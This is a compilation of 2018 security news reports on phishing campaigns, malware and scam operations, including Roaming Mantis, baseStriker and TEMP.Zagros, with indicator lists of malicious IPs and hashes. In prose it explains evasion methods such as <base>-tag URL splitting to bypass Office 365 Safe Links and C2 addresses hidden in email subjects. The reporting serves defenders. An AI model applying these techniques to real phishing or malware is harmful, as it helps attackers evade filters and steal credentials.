- Phishing -

Last update 09.10.2017 13:16:51

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5


Agari Employs Active Defense to Probe Nigerian Email Scammers
24.5.2018 securityweek 

Agari, a firm that offers protection against email-borne threats, has spent the last 10 months analyzing the targets, tactics and identities of 10 separate criminal organizations. All ten organizations concentrate on email scam attacks; and nine of the ten are located in Nigeria.

While this does not prove that 90% of email scams come out of Nigeria, it is probably fair to say that Nigeria dominates this vector. The organizations were originally selected via scam emails targeted at Agari customers and blocked by Agari software. But Agari's analysis is far more than just an investigation into known scamware.

Chief scientist Markus Jakobsson told SecurityWeek that he and his team developed a method of gaining access to the scammers' own mailboxes, using what he describes as responsible active defense. The responsible element includes gaining FBI 'acquiescence' on the project. It is described as 'active defense' because it falls short of 'hacking back'. "You could describe it," he told SecurityWeek, "as a process of socially engineering the social engineers."

During the course of the project using this methodology, he and his team captured 78 criminal email accounts belonging to 10 different criminal organizations and containing 59,652 unique emails. In a report (PDF) published Tuesday, Agari was able to analyze the process and progress of email scams rather than just the content of individual scam emails.

Just like cybercriminals globally, the Nigerian scammers are becoming more sophisticated (using, for example, persistent and stealthy malware to penetrate organizations' email accounts), and are beginning to direct their attention against commercial organizations rather than individual computer users. As elsewhere, 'profit' is the motive: business email compromise (BEC) attacks require less individual effort for a much higher return.

Agari's research shows that the average BEC incident nets $35,000 for the criminals. 3.97% of people who answer a BEC email become victims -- and 24% of all email scams are now BEC. In June 2017, the FBI reported that the total worldwide dollar loss to BEC scams was in the region of $5.3 billion.

BEC works by the scammer masquerading as the company president or CEO, and requesting that Finance should send an urgent payment to a customer or business partner. The figures show that it is remarkably successful. But despite its success and despite the higher returns on effort, it is not the most frequent scam. That remains -- from the same criminal organizations -- the romance scam.

This is a primary method, along with work-from-home scams, used to recruit the money mules needed to get money out of the country (asking Finance to wire money direct to Nigeria or China or the Philippines would probably fail at the first hurdle). "Recruiting money mules is a full-time effort for each of the groups we captured. As the scammer groups are typically based overseas, a successful scamming operation is entirely dependent on money transfer techniques that evade suspicion."

Typically, a romance scam works by first making contact through a dating website. As soon as possible, the conversation is moved to a separate communications channel, and the scammer starts to ask for small sums of money to help with some contrived hardship. "Once the victim starts complaining about money, offer them a way to get all of their money back by simply cashing a couple of checks and sending part of the money to the scammer via MoneyGram or Western Union."

Once this happens, the romance victim becomes susceptible to blackmail and a money mule (or money launderer) has been recruited. Money scammed from other victims is not wired directly abroad, but wired to the local mule's bank account, and from there on to its overseas destination.

The details of such scams -- and many more categories are discussed in the Agari report -- are already well-understood. What is new, however, is Agari's ability to monitor the captured criminal email accounts over time and see the scam unfolding; both the scammers' requests and the victims' replies.

On several occasions Agari was able to step in and warn the victim. In November 2017, for example, it warned 5 real estate firms that their email had been compromised. In April 2018, "an Agari researcher identified [a] BEC attack and was able to warn the accounts payable team just in time to reverse the wire payment. The response from the victim was a condemnation of the attacker using words too colorful to print."

The Agari project is an example of the growing determination of cyber defenders to stop being entirely reactive to threats, and to begin an offensive against the attackers. It is an excellent example of the potential of the concept of active defense. Not only was Agari able to disrupt criminal activity, capture of the criminals' email accounts enabled them to identify many of the individual criminals.

"In close partnership with law enforcement, our customers and our partners, "says the report, "Agari will continue to capture and report identity-based attacks and help turn the tide of online crime."

Agari raised $22 million Series D funding in May 2016, bringing the total raised by the company to $44.7 million.

Roaming Mantis dabbles in mining and phishing multilingually
22.5.2018 Kaspersky

In April 2018, Kaspersky Lab published a blogpost titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices. This activity is located mostly in Asia (South Korea, Bangladesh and Japan) based on our telemetry data. Potential victims were redirected by DNS hijacking to a malicious web page that distributed a Trojanized application spoofed Facebook or Chrome that is then installed manually by users. The application actually contained an Android Trojan-Banker.

Soon after our publication it was brought to our attention that other researchers were also focused on this malware family. There was also another publication after we released our own blog. We’d like to acknowledge the good work of our colleagues from other security companies McAfee and TrendMicro covering this threat independently. If you are interested in this topic, you may find the following articles useful:

Android Banking Trojan MoqHao Spreading via SMS Phishing in South Korea
XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing
In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.

27 languages: targeting the world
In our previous blogpost we mentioned that a user attempting to connect to any websites while using a hijacked DNS, will be redirected to malicious landing pages on the rogue server. The landing page displays a popup message that corresponds to the language settings of the device and which urges the user to download a malicious apk file named ‘facebook.apk’ or ‘chrome.apk’.
Kaspersky Lab confirmed several languages hardcoded in the HTML source of the landing page to display the popup message.

The attackers substantially extended their target languages from four to 27, including European and Middle Eastern languages. And yet, they keep adding comments in Simplified Chinese.
But, of course, this multilingualism is not limited to the landing page. The most recent malicious apk (MD5:”fbe10ce5631305ca8bf8cd17ba1a0a35″) also was expanded to supports 27 languages.

The landing page and malicious apk now support the following languages:

Traditional Chinese
Simplified Chinese
We believe the attacker made use of an easy method to potentially infect more users, by translating their initial set of languages with an automatic translator.

Apple phishing site for iOS device
Previously, this criminal group focused on Android devices only. They have apparently changed their monetizing strategy since then. The attackers now target iOS devices as well, using a phishing site to steal user credentials. When a user connects to the landing page via iOS devices, the user is redirected to ‘http://security.apple.com/’:

A legitimate DNS server wouldn’t be able to resolve a domain name like that, because it simply doesn’t exist. However, a user connecting via a compromised router can access the landing page because the rogue DNS service resolves this domain to the IP address 172.247.116[.]155. The final page is a phishing page mimicking the Apple website with the very reassuring domain name ‘security.apple.com’ in the address bar of the browser.

The phishing site steals user ID, password, card number, card expiration date and CVV. The HTML source of the phishing site also supports 25 languages.

The supported languages are almost the same as on the landing pages and malicious apk files – only Bengali and Georgian are missing from the phishing site.

Web crypto mining for PC
Looking at the HTML source code of the landing page, we also discovered a new feature: web mining via a special script executed in the browser. More details about web miners can be found in our blogpost ‘Mining is the new black‘.

Coinhive is the most popular web miner used by cybercriminals around the world. When a user connects to the landing page from a PC, the CPU usage will drastically increase because of the crypto mining activity in the browser.

Real C2 destination is hidden in email subject
Older malicious apk samples include a legitimate website, accounts and a regular expression for retrieving the real C2 address, which the malware connects to by using a web socket. This process for obtaining its C2 changes in more recent samples, further described below:

MD5 f3ca571b2d1f0ecff371fb82119d1afe 4d9a7e425f8c8b02d598ef0a0a776a58 fbe10ce5631305ca8bf8cd17ba1a0a35
Date March 29 2018 April 7 2018 May 14 2018
File name chrome.apk facebook.apk $random_num{8}.apk
Legitimate web http://my.tv.sohu[.]com/user/%s https://www.baidu[.]com/p/%s/detail n/a
Email n/a n/a @outlook.com
Accounts 329505231
329505338 haoxingfu88
wokaixin158998 haoxingfu11
RegExp “<p>([\u4e00-\u9fa5]+?)</p>\s+</div>” “公司</span>([\\u4e00-\\u9fa5]+?)<“ “abcd”
Encrypted dex \assets\db \assets\data.sql \assets\data.sql
Encoding Base64 Base64 + zlib compression Base64 + zlib compression
Older samples retrieved the next C2 by accessing the legitimate website, extracting a Chinese string from a specific part of the HTML code, and decoding it. This scheme has been changed in the recent sample. Instead of using HTML protocol, it now uses email protocol to retrieve the C2.

The malware connects to an email inbox using hardcoded outlook.com credentials via POP3. It then obtains the email subject (in Chinese) and extracts the real C2 address using the string “abcd” as an anchor.
The old and new decoding functions are exactly the same.

We decoded the following next stage C2 servers:

Backdoor command “ping”
Kaspersky Lab observed that the previous malicious apk (MD5:f3ca571b2d1f0ecff371fb82119d1afe) had 18 backdoor commands to confirm victims’ environments and to control devices.
According to our analysis, the recent malicious apk (MD5:fbe10ce5631305ca8bf8cd17ba1a0a35) now implements 19 backdoor commands: “ping” was added.

The backdoor commands in the recent sample are as follows:

ping NEW
This additional command calls the OS ping command with the IP address of the C2 server. By running this, the attackers validate the availability of the server, packet travel time or detect network filtering in the target network. This feature can also be used to detect semi-isolated research environments.

Auto-generating apk file and filename
Roaming Mantis uses a very simple detection evasion trick on the malicious server. It entails the landing page generating a filename for the malicious apk file using eight random numbers.

Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018. It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes. This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.
However, the malicious apk still contains a loader inside ‘classes.dex’ and an encrypted payload inside ‘\assets\data.sql’ that are identical to those in the previous variants. For security researchers, we have added MD5 hashes of the decrypted payloads without hashes of the whole apk files in the IoC of this report, as well as a few full apk hashes that were uploaded to VirusTotal.

Rapidly improving malicious apk and landing pages
Since our first report, Roaming Mantis has evolved quickly. The update history shows how rapidly the threat has been growing:

The actors behind it have been quite active in improving their tools. As seen in the graph below, which shows the unique detected user counts per day according to KSN data, the count increased on May 5. That date is very close to the update date of the new features on the landing pages.

Geographical expansion
Kaspersky Lab products detect Roaming Mantis’s malicious apk files as ‘Trojan-Banker.AndroidOS.Wroba’. Below is the data from Kaspersky Security Network (KSN) based on the verdict ‘Trojan-Banker.AndroidOS.Wroba.al’ from May 1 to May 10, 2018.

It’s clear from this that South Korea, Bangladesh and Japan are no longer the worst affected countries; instead, Russia, Ukraine and India bore the brunt. According to data gathered between February 9 and April 9, the unique user count was 150. It’s worth mentioning that the most recent data shows more than 120 users of Kaspersky Lab products were affected in just 10 days.
Also, it’s important to note that what we see in the KSN data is probably a tiny fraction of the overall picture. There are two reasons for that:

Some users may be using other AV products or no products at all.
Roaming Mantis, after all, uses DNS hijacking, which prevents even our customers from reporting a detection. However, some devices made it through – probably due to switching to cellular data or connecting to another Wi-Fi network.
The Roaming Mantis campaign evolved significantly in a short period of time. The earliest report of this attack was made public by researchers from McAfee in August 2017. At that time, the Roaming Mantis distribution method was SMS and there was one target: South Korea. When we first reported this attack in April 2018, it had already implemented DNS hijacking and expanded its targets to the wider Asian region.
In our report of April this year, we called it an active and rapidly changing threat. New evidence shows a dramatic expansion in the target geography to include countries from Europe, the Middle East and beyond by supporting 27 languages in total. The attackers have also gone beyond Android devices by adding iOS as a new target, and recently started targeting PC platforms – the landing page PC users are redirected to is now equipped with the Coinhive web miner.
The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.
The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.

For our previous findings, please refer to the Securelist post Roaming Mantis uses DNS hijacking to infect Android smartphones.

Kaspersky products detect this malware as:

Kaspersky Lab products block the Coinhive web miner for PC.

Malicious hosts:

118.168.201[.]70 NEW
118.168.202[.]125 NEW
172.247.116[.]155 NEW
220.136.73[.]107 NEW
220.136.78[.]40 NEW
220.136.182[.]72 NEW
Malicious apks:

07eab01094567c6d62a73f7098634eb8 NEW
531714703557a58584a102ecc34162ff NEW
9f94c34aae5c7d50bc0997d043df032b NEW
cc1e4d3af5698feb36878df0233ab14a NEW
ee0718c18b2e9f941b5d0327a27fbda1 NEW

13c8dda30b866e84163f82b95008790a NEW
1b984d8cb76297efa911a3c49805432e NEW
46c34be9b3ff01e73153937ef35b0766 NEW
5145c98d809bc014c3af39415be8c9ac NEW
6116dc0a59e4859a32caddaefda4dbf4 NEW
a5d2403b98cddcd80b79a4658df4d147 NEW
b4152bee9eca9eb247353e0ecab37aa5 NEW
bf5538df0688961ef6fccb5854883a20 NEW
e56cccd689a9e354cb539bb069733a43 NEW
fe0198f4b3d9dc501c2b7db2750a228b NEW
Decrypted payload (dex file) from \assets\data.sql:

28ef823d10a3b78f8840310484e3cc69 NEW
3e01b64fb9fe9605fee7c07e42907a3b NEW
3ed3b8ecce178c2e977a269524f43576 NEW
6d5f6065ec4112f1581732206539e72e NEW

Phishers Use New Method to Bypass Office 365 Safe Links
8.5.2018 securityweek 

Cybercriminals have been using a new method to ensure that the URLs included in their phishing emails bypass the Safe Links security feature in Office 365, cloud security company Avanan revealed on Tuesday.

Safe Links, offered as part of Microsoft’s Office 365 Advanced Threat Protection (ATP) solution, is designed to protect organizations against malicious links delivered through emails and documents. Safe Links checks the original URL to see if it has been blacklisted (by Microsoft or the ATP customer) or if it points to malware. If a malicious element is detected, the original link is replaced and users are alerted when they click on it.

Avanan says cybercriminals have found a simple way to bypass this security feature by using a <base> tag in the HTML header – basically splitting the malicious URL. Using this method, Safe Links only checks the base domain and ignores the rest – the link is not replaced and the user is allowed to access the phishing site.

Base tag phishing - Safe Links bypass

“At one time, email clients did not support the <base> tag, so every link need to be an absolute URL. Support for relative URLs in email is a recent development and the behavior is client dependent. Older email clients will ignore the <base> tag, but web-based email clients, recent desktop clients and most mobile apps will now handle the <base> tag and recombine the URL into a clickable link,” Avanan explained.

The attack method, which Avanan has dubbed “baseStriker,” works against the Outlook clients, including the web-based, mobile and desktop applications, which support the <base> header tag. Gmail is not impacted and some security solutions, such as the one provided by Mimecast, protect users against these attacks.

While Avanan has only seen this method being exploited in phishing attacks, they believe it can also be leveraged to deliver ransomware and other types of malware.

Avanan discovered the use of this attack method after seeing that some phishing emails made it past filters included in Microsoft and Proofpoint products. An investigation revealed that the malicious messages that bypassed these filters had been using the <base> tag.

“What made this attack interesting was that the URLs that were making it through were already known by the major blacklist databases that Microsoft subscribes to,” Yoav Nathaniel, Avanan research engineer, told SecurityWeek.

According to Nathaniel, a majority of the phishing messages observed by Avanan purport to be DocuSign or Office 365 links and they lead to a fake login page.

“The FROM address is customized on a per-email basis to look like the email is an internal one. The FROM: takes the form of ‘targetcompany.com <name@realdomain.com>’ so the user will see ‘targetcompany.com’ as the name, often fooling the user into thinking it is an internal email address. The email is coming from a real email account so the sender passes SPF and DKIM,” Nathaniel said.

“The SUBJECT is customized on a per-email basis to seem like the message is an internal one. The SUBJECT is of the form ‘realemailaddress@targetcompany.com has sent you a document’,” he added. “The email includes the one or more logos including Office365 or DocuSign or other document sharing service as well as the standard boilerplate text that would be expected at the bottom of such an email. The emails are well-crafted with few or no spelling mistakes.”

Microsoft has been made aware of these attacks and the company has launched an investigation.

“Microsoft has a customer commitment to investigate reported security issues and provide resolution as soon as possible,” a Microsoft spokesperson told SecurityWeek. “We encourage customers to practice safe computing habits by avoiding opening links in emails from senders they don’t recognize.”

This is not the first time researchers have found a way to bypass Safe Links. Both Avanan and others have disclosed several methods in recent months.

Phishing campaign aimed at Airbnb users leverages GDPR as a bait
5.5.2018 securityaffairs

Cybercriminals are targeting Airbnb users with phishing emails that urge the compliance with the new privacy regulation General Data Protection Regulation (GDPR).
The upcoming General Data Protection Regulation (GDPR) privacy laws threaten with severe penalties to demand personal information from Airbnb users. The interest on the subject is very high among professionals and companies operating in various industries, it’s normal that crooks will try to take advantage of this situation.

Airbnb, like many other companies, is sending emails to inform users of changes in the privacy law according to the upcoming GDPR.

Cybercriminals are targeting Airbnb users demanding personal information and financial data referencing the GDPR.

Experts from Redscan are monitoring a spam campaign targeting Airbnb users with spam messages like the following one:

“This update is mandatory because of the new changes in the EU Digital privacy legislation that acts upon United States-based companies, like Airbnb in order to protect European citizens and companies,” reads the spam message according to the Redscan.

airbnb gdpr phishing

The extent of the campaign is still unclear, crooks are targeting businesses’ email addresses taken online.

The phishing messages pretend to be a GDPR information request sent by Airbnb to hosts of the service.

“The irony won’t be lost on anyone that cybercriminals are exploiting the arrival of new data protection regulations to steal people’s data,” Skynews cited Redscan Director of Cybersecurity Mark Nicholls Nicholls as saying.

The phishing emails use a simple as effective social engineering trick, the message informs hosts they can’t accept new bookings or contact potential guests until they accept their organizations are not compliance to the GDPR.

Malicious email uses a domain that could appear as legitimate, according to Redscan, in this campaign, hackers rather than the legitimate @airbnb.com domain used the @mail.airbnb.work domain.

If the victims click the malicious link embedded in the email, they redirected to phishing page designed to request victims both personal and financial information.

“Modern phishing campaigns are becoming increasingly difficult to spot and people need to be extra vigilant when opening emails and clicking links, since it’s important to ensure they originate from a trusted source.” said Mark Nicholls, Redscan’s director of cybersecurity.

It is important to highlight, that GDPR notifications sent by companies to its customers don’t ask for users’ credentials, so be careful and stay vigilant.

New Advanced Phishing Kit Targets eCommerce
26.4.2018 securityweek

A new advanced phishing kit has surfaced, which provides miscreants with more than the usual one or two pages used to collect personal and financial data from victims, Check Point warns.

The phishing kit is currently being advertised on the Dark Web at $100-$300 and has been designed to target online users looking to shop at popular retailers, in an attempt to steal their personal details and credit card information.

Advertised by a certain [A]pache, the kit doesn’t only display a login page with a prompt for personal and financial information. Instead, it incorporates entire replicas of retail sites, Check Point's security researchers have discovered.

Through the kit’s backend interface, cybercriminals can create convincing fake retail product pages, in addition to being able to manage their entire phishing campaign. The [A]pache Next Generation Advanced Phishing Kit is mainly targeting users in Brazil with convincing replicas of Walmart, Americanas, Ponto Frio, Casas Bahia, Submarino, Shoptime and Extra.

“By preparing a site with discounted products that appear to be sold by a legitimate retailer, the threat actor can then lure victims into making a ‘purchase’, at which point they surrender their personal and financial information,” Check Point notes.

Miscreants downloading [A]pache’s multi-functioning phishing kit don’t need advanced technical abilities to get started with their own cyber-attacks. The kit comes with installation instructions that allows any actor to launch a campaign fast.

Packing a full suite of tools to carry out an attack, the kit seems aimed at those with a good knowledge of Portuguese, but the security researchers discovered that some U.S. brands were targeted as well.

To trick victims, the attackers use domain names similar to those of the legitimate sites. Once the fake domains have been registered, the miscreants deploy the kit to a PHP and MySQL supported web host, and then log in to the admin panel to configure the campaign.

Actors can select an email address to receive notifications; to enter the URL of the phishing site; to choose to disable ‘Boleto Bancário’ (and force victims to enter their credit card data); to insert legitimate product URLs from the retailer’s website for automatic import; and to manage the phished victim information.

“[A]pache has made a simple user interface within the admin panel where the threat actor can paste the product URL of the legitimate retailer and the kit will automatically import the product information into the phishing page. They can then view their ‘products’ and change their original prices,” Check Point explains.

The phishing sites also claim to be offering competitive prices, in an attempt to motivate potential ‘customers’ into clicking on items and proceeding to checkout. However, prices aren’t reduced by much, as that would raise suspicions. Highly valued and desired items are listed first, to entice potential victims.

Not only does the fake website look exactly like the target site, but an automated post-code look-up function for added conviction is also included in the phishing kit. Thus, unsuspecting victims would easily reveal their payment details, including the card’s CVV, and the attacker can view the stolen details in the admin panel.

The victim is instead notified that the payment process has failed, so as to avoid arising suspicion when the purchased fake products do not arrive. The attackers would often take down the fake sites after successful attacks, to avoid being caught.

In one case, the researchers found a custom built ‘error 404’ site in use, which makes reference to a non-existent ‘Blue World Electronicos’ company. An English version of the page was found being used online on a few domains serving PayPal phishing scams.

Thus, the researchers discovered that the author of the Brazilian phishing kit appears to be behind kits targeting US victims as well. After finding the handle ‘Douglas Zedn’ in the control panel of the Walmart phishing site, the researchers managed to link it to the individual’s Steam account and then to their Twitter account.

“With some reports claiming that 91% of cyberattacks and data breaches begin with a phishing email, phishing remains a constant threat for stealing financial information, intellectual property, and even interfering with elections. For this reason, consumers and businesses alike must ensure they have the latest protections for safeguarding against such threats,” Check Point concludes.

Mobile Phishing Attacks Up 85 Percent Annually
12.4.2018 securityweek 

The rate at which users are receiving and clicking on phishing URLs on their mobile devices has increased at an average rate of 85% per year since 2011, mobile security firm Lookout reports.

What’s more worrisome is the fact that 56% of users received and clicked on a phishing URL that bypasses existing layers of defense, the security firm says. On average, a user clicked on a mobile phishing URL six times per year.

In a new report (PDF) analyzing the present state of mobile phishing, the security company explains that attackers are successfully circumventing existing phishing protections to target the mobile devices. Thus, they manage to expose sensitive data and personal information at an alarming rate, the company claims.

With over 66% of emails first opened on a mobile device and email arguably the first point of attack for a phishing actor, unprotected emails on a mobile device can easily turn into a new avenue for attack.

“Most corporations are protected from email-based phishing attacks through traditional firewalls, secure email gateways, and endpoint protection. In addition, people today are getting better at identifying phishing attacks. Mobile, however, has made identifying and blocking phishing attacks considerably more difficult for both individuals and existing security technologies,” Lookout notes.

The security firm claims that existing phishing protections are not adequate for mobile devices, where the relatively small screen makes distinguishing a real login page from a fake one highly problematic. On mobile, email is only one of the possible attack vectors, with truncated malicious URLs and apps accessing potentially malicious links also being used for compromise.

SMS and MMS also provide attackers with new means of phishing, not to mention popular and highly used personal social media apps and messaging platforms such as WhatsApp, Facebook Messenger, and Instagram. According to Lookout, more than 25% of employees click on a link in an SMS message from a phone number spoofed.

One attacker known to have used a non-email means of phishing is the threat actor behind ViperRAT, who engaged into conversations with their victims after posing as women on social media platforms. Once they managed to establish their trust, the actor asked the victims to download an app for “easier communication.”

In another example, an attacker targeted iOS and Android users via Facebook Messenger, suggesting that they appeared in a YouTube video. When clicking on the provided link, the user was served a fake Facebook login page meant to steal their credentials.

Lookout also notes that users are three times more likely to click on a suspicious link on a phone than on a PC. On a mobile device, users can’t always see the entire link they click on, as they would on a desktop, and there isn’t always a firewall to keep the device protected, as would be the case with a PC in a corporate environment.

“Mobile phishing is increasingly the tip of the spear for sophisticated, large-scale attacks. Some of the most active attacks come from mobile advanced persistent threats, or mAPTs,” Lookout also notes.

While an APT is a group, usually a nation-state, which can persistently and effectively target other nation-states, businesses, or individuals to steal information, a mAPT brings such attacks to mobile. Dark Caracal and Pegasus are only a couple of the most recent examples of such attacks.

Furthermore, because some applications contain URLs in the codebase to communicate and fetch information in real-time, attackers can abuse the functionality for phishing. Thus, enterprises should worry about “benign apps” that access malicious URLs.

“For example, apps often use advertising to make money. In order to do so, they incorporate ad SDKs into their code. These SDKs connect to URLs behind the scenes in order to display ads to the end user. If a benign app uses an ad SDK run by an attacker, that attacker may use the SDK to access malicious URLs in order to display ads meant to trick the end user into giving over sensitive data,” Lookout explains.

European police agencies coordinated by Europol arrested 20 people for Spear Phishing scam
31.3.2018 securityaffairs 

An international operation conducted by the Romanian National Police and the Italian National Police, with support from Europol, the Joint Cybercrime Action Taskforce (J-CAT), and Eurojust. led to the arrest of 20 individuals involved in a banking spear phishing scam.
According to the investigators, the banking phishing scam allowed crooks to defrauded bank customers of €1 million ($1.23 million).

The international investigation lasted two years, the police conducted a series of coordinated raids. 9 of the individuals were arrested in Romania and 11 in Italy.

The Romanian Police raided 3 houses in the country, while the Italian police raided 10 houses and conducted several computer searches.

“A two-year long cybercrime investigation between the Romanian National Police and the Italian National Police, with the support of Europol, its Joint Cybercrime Action Taskforce (J-CAT) and Eurojust, has led to the arrest of 20 suspects in a series of coordinated raids on 28 March. 9 individuals in Romania and 11 in Italy remain in custody over a banking fraud netted EUR 1 million from hundreds of customers of 2 major banking institutions.” reads the press release published by the Europol.

“The Romanian authorities have conducted 3 house searches, while the Italian National Police ordered the execution of 10 home and computer searches, involving more than 100 Italian policemen.”

According to the Europol, the banking fraud scheme netted €1 million from hundreds of customers of targeted 2 major banks.

Most of the members of the gang are Italians, they were using with spear phishing messages posing as tax authorities, in an attempt to harvest their online banking credentials.

“While the most common phishing scams blast out millions of generic e-mails, spear phishing emails are personally addressed to targeted stakeholders with content to make it appear from a reputable source, such as a bank. Recipients are encouraged to click on a link, which will lead to a fake version of a legitimate website where their account or contact details can be stolen.” continues the press release.

The authorities are monitoring the activity of the crime gang since 2016, once the attackers stole credentials through spear phishing message they log into their victims’ accounts and drained funds.

The gang made the cash out through ATMs in Romania, using payment cards associated with criminal accounts.

The crime gang was using encrypted chat applications for the communication and according to the police they also used intimidating and punitive methods towards affiliates and competitors to establish power.

The authorities suspect the group of other illegal activities, including money laundering, as well as drug and human trafficking, prostitution, and participation in a criminal organization.

This is the second successfully operation announced by the Europol in a few days, earlier this week, the agency announced the arrest of the head of the crime ring behind the Carbanak gang that since 2013 targeted banks worldwide.

Iran-linked group TEMP.Zagros now targets Asia and Middle East regions
19.3.2018 securityaffairs
Experts at FireEye uncovered a new massive phishing campaign conducted by TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.
Iranian hackers are one of the most active in this period, researchers at FireEye uncovered a new massive phishing campaign targeting Asia and Middle East regions from January 2018 to March 2018.

The group behind the campaign is known as TEMP.Zagros, aka MuddyWater, and according to the experts it is now adopting new tactics, techniques, and procedures.

“We observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East. We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017.” reads the analysis published by the experts at FireEye.

“This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.”

The TEMP.Zagros was first spotted by researchers at PaloAlto Networks in 2017, the hackers targeted various industries in several countries with spear-phishing messages.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

Last week expert at Trend Micro also attributed the new wave of attacks to the MuddyWater threat actor.

“We discovered a new campaign targeting organizations in Turkey, Pakistan and Tajikistan that has some similarities with an earlier campaign named MuddyWater, which hit various industries in several countries, primarily in the Middle East and Central Asia.” states the analysis published by Trend Micro.

According to FireEye report, TEMP.Zagros attackers are adopting a new backdoor dubbed POWERSTATS for backdoors and the reuse of a known technique for lateral movements.

Each of these macro-based documents used similar techniques for code execution, persistence, and communication with the command and control (C2) server.

Hackers re-used the AppLocker bypass and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.

“In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets.” continues FireEye.

TEMP.Zagros phishing

The campaign started on Jan. 23 involved a macro-based document that dropped a VBS file and an INI file containing a Base64 encoded PowerShell command.

The Base64 encoded PowerShell command will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe.

Attackers used a differed VBS script for each sample, employing different levels of obfuscation and different ways of invoking the next stage of the process tree.

Starting from Feb. 27, 2018, hackers used a new variant of the macro that does not use VBS for PowerShell code execution. The new variant uses a new code execution techniques leveraging INF and SCT files.

Researchers at FireEye also found Chinese strings in the malicious code used by TEMP.Zagros that were left as false flags to make hard the attribution.

“During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:” states FireEye.

Indicators of compromise (IoCs) and other info are included in the report published by FireEye.

PhishMe Acquired at $400 Million Valuation, Rebranded as Cofense
26.2.2018 securityweek

Private Equity Deal Values Cofense at $400 Million

PhishMe, a security awareness firm that focuses on training employees on how to recognize and report phishing attacks, has been acquired by a private equity consortium in a deal that valued the company at $400 Million.

The company has also re-branded and changed its name to Cofense.

“PhishMe was founded to challenge the cliché - human is the weakest link,” said Rohyt Belani, CEO and Co-Founder of Cofense. “The Cofense solution set leverages internal employee-generated attack intelligence in concert with purpose-built response technologies to break the attack kill chain at delivery. Cofense reflects the full breadth of our portfolio of enterprise-wide attack detection, response, and orchestration solutions.”

Cofense LogoThe company says it currently has more than 1700 customers globally and that its PhishMe Reporter is installed on more 10 million endpoints.

In a recent survey by the Financial Services Information Sharing and Analysis Center (FS-ISAC) that polled more than 100 of its 7,000 global members, thirty-five percent of CISOs in the financial sector consider staff training to be the top priority for cyber defense.

“With cybersecurity a top priority for organizations everywhere, our goal is to continue bringing innovative products to markets around the globe to help stop active attacks faster than ever,” Belani added.

Cofense says it has experienced roughly 80% CAGR over the last four years, and has new offices opening in Australia, Singapore, Dubai, and Saudi Arabia.

The company has previously raised a total of roughly $58 million, including a large $42.5 million funding round in July 2016. The company had raised $2.5 million in July 2012 in a Series A round, followed by $13 Million in a Series B funding round in March 2015.

Security awareness firms have been the subject of significant funding and M&A transactions in recent months.

Earlier this month, security awareness training firm Wombat Security agreed to be acquired by Proofpoint for $225 million in cash. In August 2017, Webroot acquired Securecast, an Oregon-based company that specializes in security awareness training. In October 2017, security awareness training and simulated phishing firm KnowBe4 secured $30 million in Series B financing, which brought the total amounbt raised by KnowBe4 to $44 million. Security awareness training firm PhishMe has raised nearly $58 million in funding, including a $42.5 million series C funding round in July 2016.